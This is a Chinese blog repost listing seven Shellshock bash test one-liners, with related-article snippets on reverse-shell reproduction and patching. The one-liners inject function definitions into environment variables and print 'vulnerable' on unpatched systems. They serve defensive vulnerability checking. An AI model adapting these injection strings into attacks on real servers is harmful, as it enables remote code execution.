CVE-2014-6271 Bash漏洞利用工具

最新推荐文章于 2022-08-06 10:57:24 发布
最新推荐文章于 2022-08-06 10:57:24 发布
阅读量431 收藏
点赞数
文章标签: 运维
原文链接:http://www.cnblogs.com/baxk/p/5177182.html
版权

CVE-2014-6271 Bash漏洞利用工具 

 
Exploit 1 (CVE-2014-6271)
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If you see "vulnerable" you need to update bash. Otherwise, you should be good to go

 

Exploit 2 (CVE-2014-7169)

Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.

env X='() { (shellshocker.net)=>\' bash -c "echo date"; cat echo; rm ./echo

If the above command outputs the current date (it may also show errors), you are still vulnerable.

 

Exploit 3 (???)

Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.

env X=' () { }; echo hello' bash -c 'date'

If the above command outputs "hello", you are vulnerable.

Exploit 4 (CVE-2014-7186)
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
echo "CVE-2014-7186 vulnerable, redir_stack"

A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".

Exploit 5 (CVE-2014-7187)
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
echo "CVE-2014-7187 vulnerable, word_lineno"

A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".

Exploit 6 (CVE-2014-6278)
shellshocker='() { echo You are vulnerable; }' bash -c shellshocker

You shouldn't see "You are vulnerable", if you're patched you will see "bash: shellshocker: command not found"

 

Exploit 7 (CVE-2014-6277)
bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable

If the command outputs "vulnerable", you are vulnerable.



转载于:https://www.cnblogs.com/baxk/p/5177182.html

weixin_34357267
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2014-6271“破壳”漏洞利用过程
D-river博客
11-12 9092
前言CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。实验环境攻击机:kali linux 目标机: Ubuntu ip: 10.10.10.129漏洞验证 Bash版本小于等于4.3可能存在漏洞 可
CVE-2014-6321 schannel堆溢出漏洞分析
weixin_34375054的博客
03-08 1674
cssembly · 2014/12/05 12:090x00 背景MS14-066 (CVE-2014-6321) 是存在于Microsoft的schannel.dll中的TLS堆缓冲区溢出漏洞。下面对原理以及poc构造进行分析。0x01 SSL/TLS原理介绍Https是一种基于SSL/TLS的Http,所有的http数据都是在SSL/TLS协议封装之上传输的。研究Https协议原理,最终其实...
破壳漏洞(CVE-2014-6271)综合分析
Star——Flying in the cyberspace
11-25 2895
目 录 一、 威胁卡片  二、 概述  三、 已知事件发布/披露情况 四、 漏洞的影响范围  五、 漏洞原理  六、 漏洞验证方法  七、 漏洞检测方法  八、 漏洞可能会带来的影响  九、 针对此漏洞的建议  十、 写在最后的啰嗦的话      一、     威胁卡片 二、概述        2014年9月24日Bash被公布存在远程代码执行漏洞,安天实验室
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 2973
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis
weixin_30338497的博客
11-12 1465
目录 1. 漏洞的起因 2. 漏洞原理分析 3. 漏洞的影响范围 4. 漏洞的利用场景 5. 漏洞的POC、测试方法 6. 漏洞的修复Patch情况 7. 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和windows的Secure Channel (Schannel)有关 The Secure Channel (Schannel) security...
CVE-2014-6287漏洞利用
yeshankuangrenaaaaa的博客
07-23 1443
目录CVE-2014-6287漏洞利用漏洞描述参考链接漏洞描述漏洞威胁版本漏洞复现靶机环境准备攻击浏览器方式脚本方式kali-msf工具复现结论 CVE-2014-6287漏洞利用 漏洞描述 参考链接 CVE-2014-6287 漏洞描述 发布时间:2014-09-15漏洞平台:windows 漏洞应用:HttpFileServer_v2.3_search命令执行漏洞 HTTPFileServer是一款专为个人用户所设计的HTTP文件服务器。Rejetto网站提供的HTTPFileServer 2.3b
shellshocker-python:这是一个 Python 应用程序,可帮助您检测运行 bash 的计算机是否存在 CVE-2014-6271 漏洞
06-23
Shellshocker 是一个著名的安全漏洞,发生在 2014 年,具体称为 CVE-2014-6271,也被称作“Bash 漏洞”或“Shellshock 漏洞”。这个漏洞影响了广泛使用的 Unix 和 Linux 系统中的 Bash(Bourne-Again SHell)命令...
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
在2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码,即所谓的预认证远程代码执行(PreAuth RCE)。这个漏洞的影响非常严重,因为它无需任何登录凭据即可利用。 漏洞复现...
Linux Polkit 权限提升漏洞(CVE-2021-4034)CentOS 7和Centos 6修复升级的 rpm 离线包
02-08
攻击者可以利用此漏洞创建一个恶意程序,当被正常用户执行时,恶意程序可以通过调用pkexec获得root权限,从而实现权限提升。由于这个漏洞的严重性,攻击者只需要在系统上具有普通用户权限就能发起攻击,无需任何额外...
Linux Bash漏洞详细说明
10-09
Shellshock漏洞由两个主要的CVE编号标识:CVE-2014-6271CVE-2014-7169。这两个编号分别对应不同的安全问题,但都与Bash处理环境变量的方式有关。CVE-2014-6271是最初发现的漏洞,而CVE-2014-7169是在修复第一个...
SuSE Linux Enterprise Server 10.3 Bash漏洞修复方案(含升级tar包)
09-29
SuSE Linux Enterprise Server 10.3 Bash漏洞修复方案(含升级tar包),tar包集成最新的bash漏洞patch,直接按方案描述升级即可修复漏洞!
Exploits:针对 Web、Windows、Linux 等的 CVE 漏洞利用由朱日实验室独立编写
05-30
本主题聚焦于朱日实验室独立编写的针对Web、Windows和Linux系统的CVE(Common Vulnerabilities and Exposures)漏洞利用CVE是一个全球性的公开漏洞数据库,用于记录和分配独特的ID给已知的安全漏洞。 首先,我们...
Bash - shellshocker
Nixawk
11-19 804
漏洞编号 测试代码 CVE-2014-6271 env X='() { :; }; echo "CVE-2014-6271 vulnerable"'bash -c id CVE-2014-6277 env X='() { x() { _; }; x() { _; } CVE-2014-6278 env
CVE-2014-6271——bash破壳漏洞复现
per_se_veran_ce的博客
08-23 909
(1)检查是否存在bash漏洞 env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test” 安装、配置apache服务 Apache支持CGI 在cgi-bin下创建一个cgi测试文件test.cgi,并赋予它777的权限 chmod 777 test.cgi curl -H 'x: () { :;...
linux shellshock漏洞,修复linux bash的ShellShock系列漏洞
weixin_34515820的博客
05-18 226
检查是否有linux bash的ShellShock系列漏洞ShellShock系列漏洞包含有CVE-2014-6271CVE-2014-7169CVE-2014-7186CVE-2014-7187CVE-2014-6277CVE-2014-6278检查是否有ShellShock系列漏洞wget --no-check-certificate https://github.com/hannob/...
Critical: Update Your Windows Secure Channel (cve-2014-6321,MS14-066)
weixin_30924239的博客
11-12 731
前言:风雨欲来山满楼,下半年开始各种凶猛的漏洞层出不穷,天下已经不太平,互联网已经进入一个新的台阶 0x01cve-2014-6321   11月的补丁月,微软请windows的用户吃了顿大餐,发布了14个 security bulletins,包括权限提升的、也有远程代码执行的(windows ole、windows xml core service、IE及Secure Channel)...
linux漏洞修复步骤,redhat 破壳漏洞修补方法
weixin_33204522的博客
05-14 751
***利用该漏洞,可以执行任意代码,甚至可以不需要经过认证,就能远程取得系统的控制权,包括执行恶意程序,或在系统内植入***,或获取敏感信息。而且,BashBash 1.14到Bash 4.3版本全部存在该漏洞。检测脚本:#!/bin/bashEXITCODE=0#CVE-2014-6271CVE20146271=$(env'x=(){:;};echovulnerable''BAS...
vulhub漏洞复现之bash(Shellshock CVE-2014-6271
weixin_43071873的博客
11-27 1242
Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
CVE: 2014-6271CVE: 2014-7169 PATCH方案分析
weixin_34113237的博客
09-26 176
目录 1. RedHat官方给的PATCH第一套方案 2. RedHat官方给的PATCH临时方案 3. RedHat官方给的PATCH第二套方案   1. RedHat官方给的PATCH第一套方案 0x1: Patch修补原理 patch修复的重点有以下几个地方 1. 在builtins/common.h中增加了2种宏定义,对环境变量允许传入和解析的参数进行了限制,这是一...
NTPD PRNG弱加密漏洞(CVE-2014-9294)利用
最新发布
05-09
NTPD PRNG弱加密漏洞(CVE-2014-9294)是一个影响NTPD(Network Time Protocol daemon)的安全漏洞,攻击者可以利用此漏洞通过网络攻击系统。该漏洞允许攻击者预测NTPD使用的随机数生成器(PRNG)的输出,从而使攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值